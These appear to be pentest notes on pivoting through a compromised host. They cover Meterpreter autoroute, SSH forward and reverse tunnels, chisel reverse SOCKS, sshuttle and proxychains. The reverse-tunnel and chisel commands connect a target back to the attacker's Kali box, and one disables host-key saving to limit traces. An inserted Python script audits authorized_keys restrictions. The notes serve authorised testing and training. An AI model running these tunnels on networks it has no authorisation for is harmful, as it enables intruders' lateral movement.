ssh tunnel

NOTE: needs valid SSH creds on box to pivot from.

meterpreter tunnel

# to print existing routes 
autoroute -p

run autoroute [-s IP/CIDR]
[OR]
use post/multi/manage/autoroute
# use auxiliary/server/socks_proxy

ssh tunnel:

Forward tunnel (outgoing)

ssh user@IP -D PORT
# this opens a SOCKS proxy on localhost:PORT, tunnelled over SSH to the target
# any request sent to localhost:PORT is routed via the target

Reverse tunnel (incoming)

authorized_keys file

from="IP",command="echo 'This account can only be used for Port Forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty <SSH-PUBLIC-key>

Command

# for allowing a connection to your port from outside (incoming)
ssh -fN -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -R PORT -i <id_rsa> KALI-USER@KALI-IP

# -N: not running commands
# -f: go to background
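# UserKnownHostsFile=/dev/null & StrictHostKeyChecking=no: accept the kali host key without prompting and do not save it on the target
# -i <id_rsa>: key-based login, so the kali password is not asked for; it is not safe to enter a password on the target.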
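
A check for the authorized_keys restriction shown above, as an added example that is not part of the original notes: it parses each entry and reports which of that line's restrictions (from, command, no-pty, no-agent-forwarding, no-X11-forwarding) are missing. The sample entries, address and key blobs are constructed; treating OpenSSH's `restrict` option as covering the three no-* options is an assumption of this sketch.

```python
import re
KEY_TYPE = re.compile(r"^(ssh-|ecdsa-sha2-|sk-)\S+$")  # key field, no options before it
REQUIRED = ("from", "command", "no-pty", "no-agent-forwarding", "no-x11-forwarding")
IMPLIED_BY_RESTRICT = {"no-pty", "no-agent-forwarding", "no-x11-forwarding"}

def split_options(line):
    """Return (options dict, remainder) for one authorized_keys entry."""
    line = line.strip()
    if KEY_TYPE.match(line.split(None, 1)[0]):
        return {}, line
    opts, buf, in_quote, i = {}, "", False, 0
    while i < len(line):
        ch = line[i]
        if in_quote and line[i:i + 2] == '\\"':   # escaped quote inside a value
            buf, i = buf + '"', i + 2
            continue
        if ch == '"':
            in_quote = not in_quote
        elif not in_quote and ch in ", \t":        # option ends at unquoted , or space
            name, _, value = buf.partition("=")
            opts[name.lower()] = value             # option names are case-insensitive
            buf = ""
            if ch != ",":
                break                              # whitespace: key field starts here
        else:
            buf += ch
        i += 1
    return opts, line[i:].strip()

def audit(text):
    """Map line number -> restrictions from REQUIRED that the entry lacks."""
    findings = {}
    for n, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        present = set(split_options(raw)[0])
        if "restrict" in present:                  # restrict turns off pty/agent/X11
            present |= IMPLIED_BY_RESTRICT
        findings[n] = [r for r in REQUIRED if r not in present]
    return findings

# Constructed sample: address, key blobs and comments are placeholders.
SAMPLE = """\
from="203.0.113.10",command="echo 'This account can only be used for Port Forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-ed25519 AAAAconstructed target-tunnel
ssh-ed25519 AAAAconstructed unrestricted
restrict,port-forwarding,command="/bin/false" ssh-rsa AAAAconstructed partial
"""
for n, missing in audit(SAMPLE).items():
    print(n, "OK" if not missing else "missing: " + ", ".join(missing))
```

Run it against the tunnel account's own authorized_keys by passing the file contents to audit().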

Proxychains

/etc/proxychains4.conf

# add line for socks4/5 proxy 
[socks4|socks5] 127.0.0.1 6900

# comment out proxy_dns to avoid nmap hanging

Now, run any command using $ proxychains4 [command]

proxychains4 for browser

Set up a FoxyProxy configuration for the browser:

  1. Title: proxychains

  2. Proxy Type: SOCKS4

  3. Proxy IP: localhost

  4. Port: 6900

chisel tunnel

Reverse socks proxy

NOTE: configure proxychains using socks5 IP PORT.

# server on kali
chisel server -p 8000 --reverse

# on target
# tunnel using chisel on kali:1080
chisel client KALI_IP:8000 R:socks

Forward socks proxy

# server on target
chisel server -p 8000 --socks5

# on kali
chisel client TARGET_IP:8000 TUNNEL_PORT:socks

sshuttle tunnel

  • REQUIREMENTS:

    • Works only on linux targets

    • SSH access to target

    • Python on target (static binary works)

sshuttle -r USER@TARGET_IP [SUBNET/CIDR | -N] [--ssh-cmd "ssh -i KEY"] -x TARGET_IP
# -N: auto-identify subnets based on the target's routing table
# -x: excludes the current box when forwarding all subnet traffic
